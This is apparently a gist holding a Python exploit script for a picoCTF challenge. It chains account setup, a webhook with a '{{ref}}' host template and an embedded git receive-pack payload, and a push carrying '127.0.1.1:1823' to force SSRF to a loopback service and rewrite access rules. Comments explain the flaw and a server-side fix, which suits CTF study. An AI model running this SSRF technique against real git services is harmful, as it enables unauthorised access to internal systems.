
@jcreigh
Created March 19, 2021 18:43
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
from random import randint
import json
import base64
# Target is a picoCTF challenge instance; the account below is a throwaway
# created by this script.
BASE_URL = 'http://venus.picoctf.net:50207'
username = 'foo'
password = 'bar'

# A single Session is used so that whatever cookies the login sets are reused
# by every later request.
sess = requests.Session()

_credentials = {'user': username, 'password': password}
_setup_steps = (
    # Registration may fail if the account already exists, so the script
    # logs in afterwards regardless; responses are printed, not checked.
    ('[*] Register', '/api/register', _credentials),
    ('[*] Login just in case', '/api/login', _credentials),
    # An empty repository (no README) owned by the account above.
    ('[*] Create a repository', '/api/repo/create',
     {'name': 'Foo', 'initializeReadme': False}),
)
for _banner, _endpoint, _json_body in _setup_steps:
    print(_banner)
    res = sess.post(BASE_URL + _endpoint, json=_json_body)
    print(res, res.content)
# Request body that the webhook created below will deliver (author's note:
# "Payload to put access.conf").
#
# Decoding the hex shows a git receive-pack request:
#   * one pkt-line (length 0x0094):
#       <40 zeros> 47be09611184e9d2b068d8c94066f1c50da4a060 refs/meta/config\0
#       report-status side-band-64k agent=git/2.30.2
#     The all-zero old id is how a push announces that the ref is being created.
#   * the flush packet "0000"
#   * a packfile: magic "PACK", version 2, 3 objects, then zlib streams
#     (each starts with 78 9c).
#
# NOTE(review): the object contents are zlib-compressed, so the claim that they
# carry access.conf comes from the author's comment and is not verified here.
# Defensive takeaway: a ref such as refs/meta/config that controls access rules
# should only be writable through an authenticated, authorised path.
payload = bytes.fromhex(''.join(
['3030393430303030303030303030303030303030',
'3030303030303030303030303030303030303030',
'3030303020343762653039363131313834653964',
'3262303638643863393430363666316335306461',
'346130363020726566732f6d6574612f636f6e66',
'696700207265706f72742d737461747573207369',
'64652d62616e642d36346b206167656e743d6769',
'742f322e33302e32303030305041434b00000002',
'000000039b0b789ca58c410ac2301000ef79c57e',
'c0928d7163418ae0adbfd86ed636420ca4ebff2d',
'7e41e6329719ebaa1035fb44a4e94a21255d82d2',
'18b35c3011e2c899b2106164c71fdb5a8759f7bd',
'08c3a36b59376b6fb8bde4e7f7a7566b4bb1a1f5',
'7502a483e0c319e1e4a3f74e5aadc54cff793816',
'3962f70571863a26a702789c3334303033315148',
'4c4e4e2d2ed64bcecf4b6350ad399aa2b37141c8',
'879e13f6ba53ecc2fedaed9b090008180f9b3478',
'9c4bcbcfe7020003d1014f9b72f2ffed010fc8e1',
'b553df24235cb5ced39986']))
# Register a webhook on the repository created above.
#
# The literal text "{{ref}}" sits in the host position of the webhook URL.
# NOTE(review): presumably the service expands {{ref}} with the ref name of an
# incoming push before it sends the request - confirm against the server code.
# If so, the destination host is chosen by whoever pushes, which is a
# server-side request forgery (SSRF) condition. The fix belongs on the server:
# resolve and validate the final URL after template expansion, and refuse
# loopback and internal addresses.
print('[*] Create webhook')
hook_url = 'http://{{ref}}/_/' + username + '.git/git-receive-pack'
# encodebytes() returns base64 with a newline after every 76 characters;
# that exact form is what gets sent as the webhook body.
hook_body = base64.encodebytes(payload).decode()
data = {
    'url': hook_url,
    'contentType': 'application/x-git-receive-pack-request',
    'body': hook_body,
}
res = sess.post(BASE_URL + '/' + username + '/Foo.git/webhooks', json=data)
print(res, res.content)
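# Send a push-shaped request to the repository so the webhook fires.
#
# The body has three space-separated fields; the third, where a ref name
# would normally go, is "127.0.1.1:1823".
# NOTE(review): presumably this value fills the {{ref}} placeholder of the
# webhook URL, so the server delivers the stored webhook body to a service on
# its own loopback interface - confirm against the server code.
# Note that `payload` is rebound here; the pack data built earlier has already
# been stored in the webhook at this point.
print("[*] Trigger webhook")
payload = b'0000000000000000000000000000000000000 0000000000000000000000000000000000000 127.0.1.1:1823'
headers = {'Content-Type': 'application/x-git-receive-pack-request'}
res = sess.post(BASE_URL + f'/{username}/Foo.git/git-receive-pack', headers=headers, data=payload)
print(res, res.content)

# BASE_URL already carries the "http://" scheme, so interpolating it after
# "user:pass@" produced a malformed URL ("http://foo:bar@http://...").
# Strip the scheme first, and use the configured account instead of literals.
# Caveat: credentials embedded in a clone URL end up in shell history and in
# the clone's .git/config; acceptable only for a throwaway account.
host = BASE_URL.split('://', 1)[-1]
print(f'You can now run:\n git clone http://{username}:{password}@{host}/_/{username}.git')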